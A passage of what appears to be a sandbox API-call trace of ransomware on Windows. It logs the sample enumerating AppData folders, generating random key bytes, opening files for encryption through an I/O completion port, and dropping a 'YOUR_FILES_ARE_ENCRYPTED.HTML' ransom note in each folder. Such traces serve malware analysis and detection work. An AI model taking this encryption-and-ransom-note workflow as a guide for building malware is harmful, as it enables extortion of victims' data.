ftCreationTime.dwLowDateTime=0x40ab0ffe, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40ab0ffe, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40ab0ffe, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="EDBres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0122.286] StrStrIW (lpFirst="EDBres00002.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.286] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBres00002.jrs") returned 78 [0122.286] PathFindExtensionW (pszPath="EDBres00002.jrs") returned=".jrs" [0122.286] lstrlenW (lpString=".jrs") returned 4 [0122.286] PathFindExtensionW (pszPath="EDBres00002.jrs") returned=".jrs" [0122.287] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9ce070b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="EDBtmp.log", cAlternateFileName="")) returned 1 [0122.287] StrStrIW (lpFirst="EDBtmp.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.287] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log") returned 73 [0122.287] PathFindExtensionW (pszPath="EDBtmp.log") returned=".log" [0122.287] lstrlenW (lpString=".log") returned 4 [0122.287] PathFindExtensionW (pszPath="EDBtmp.log") returned=".log" [0122.287] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0122.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\edbtmp.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0122.288] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=2097152) returned 1 [0122.288] GetProcessHeap () returned 0x600000 [0122.288] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.290] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="3E") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="0E") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="C4") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="42") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="ED") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="7B") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="35") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="A7") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="91") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="51") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="87") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="53") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="BD") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="B3") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="D7") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="B6") returned 2 [0122.290] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="0C") returned 2 [0122.290] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="CE") returned 2 [0122.291] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="4B") returned 2 [0122.291] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="13") returned 2 [0122.291] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="CA") returned 2 [0122.291] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="19") returned 2 [0122.291] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="AD") returned 2 [0122.291] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="AA") returned 2 [0122.291] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="AD") returned 2 [0122.291] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="B3") returned 2 [0122.291] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="45") returned 2 [0122.291] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="5D") returned 2 [0122.291] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="B3") returned 2 [0122.291] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="98") returned 2 [0122.291] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="A2") returned 2 [0122.291] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="54") returned 2 [0122.292] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log" [0122.292] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.292] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.293] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b6fbaa, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40b6fbaa, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x19d2d6f5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe0000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="vedatamodel.edb", cAlternateFileName="VEDATA~1.EDB")) returned 1 [0122.295] StrStrIW (lpFirst="vedatamodel.edb", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.295] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb") returned 78 [0122.295] PathFindExtensionW (pszPath="vedatamodel.edb") returned=".edb" [0122.295] lstrlenW (lpString=".edb") returned 4 [0122.295] PathFindExtensionW (pszPath="vedatamodel.edb") returned=".edb" [0122.295] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b6fbaa, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40b6fbaa, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x19d2d6f5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe0000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="vedatamodel.edb", cAlternateFileName="VEDATA~1.EDB")) returned 0 [0122.295] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0122.295] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0122.295] GetProcessHeap () returned 0x600000 [0122.295] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3368160 [0122.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.297] WriteFile (in: hFile=0x308, lpBuffer=0x3368160*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3368160*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.298] CloseHandle (hObject=0x308) returned 1 [0122.298] GetProcessHeap () returned 0x600000 [0122.299] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3368160 | out: hHeap=0x600000) returned 1 [0122.299] GetProcessHeap () returned 0x600000 [0122.299] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0122.299] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4dfbc776, ftLastAccessTime.dwHighDateTime=0x1d70502, ftLastWriteTime.dwLowDateTime=0x4dfbc776, ftLastWriteTime.dwHighDateTime=0x1d70502, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Database", cAlternateFileName="")) returned 0 [0122.299] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0122.299] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0122.299] GetProcessHeap () returned 0x600000 [0122.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3368160 [0122.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0122.300] WriteFile (in: hFile=0x30c, lpBuffer=0x3368160*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3368160*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0122.302] CloseHandle (hObject=0x30c) returned 1 [0122.302] GetProcessHeap () returned 0x600000 [0122.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3368160 | out: hHeap=0x600000) returned 1 [0122.302] GetProcessHeap () returned 0x600000 [0122.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0122.310] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0122.310] StrStrIW (lpFirst="VirtualStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.310] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore") returned 52 [0122.310] GetProcessHeap () returned 0x600000 [0122.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0122.312] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore" [0122.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\*" [0122.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.312] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0122.312] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 0 [0122.312] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0122.312] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0122.312] GetProcessHeap () returned 0x600000 [0122.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\virtualstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0122.314] WriteFile (in: hFile=0x318, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0122.316] CloseHandle (hObject=0x318) returned 1 [0122.316] GetProcessHeap () returned 0x600000 [0122.316] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.316] GetProcessHeap () returned 0x600000 [0122.316] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0122.317] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0122.317] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0122.317] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0122.317] GetProcessHeap () returned 0x600000 [0122.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0122.319] WriteFile (in: hFile=0x304, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0122.321] CloseHandle (hObject=0x304) returned 1 [0122.321] GetProcessHeap () returned 0x600000 [0122.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.321] GetProcessHeap () returned 0x600000 [0122.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.324] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0122.324] StrStrIW (lpFirst="LocalLow", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.324] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow") returned 42 [0122.324] GetProcessHeap () returned 0x600000 [0122.324] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0122.325] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow" [0122.325] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\*" [0122.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0122.326] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="..", cAlternateFileName="")) returned 1 [0122.326] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0122.326] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.326] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft") returned 52 [0122.326] GetProcessHeap () returned 0x600000 [0122.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.327] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft" [0122.327] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\*" [0122.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x53df524e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c5a6, dwReserved1=0x63c550, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.327] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x53df524e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c5a6, dwReserved1=0x63c550, cFileName="..", cAlternateFileName="")) returned 1 [0122.328] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c5a6, dwReserved1=0x63c550, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0122.328] StrStrIW (lpFirst="CryptnetUrlCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.328] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 69 [0122.328] GetProcessHeap () returned 0x600000 [0122.328] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.329] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0122.329] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*" [0122.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, 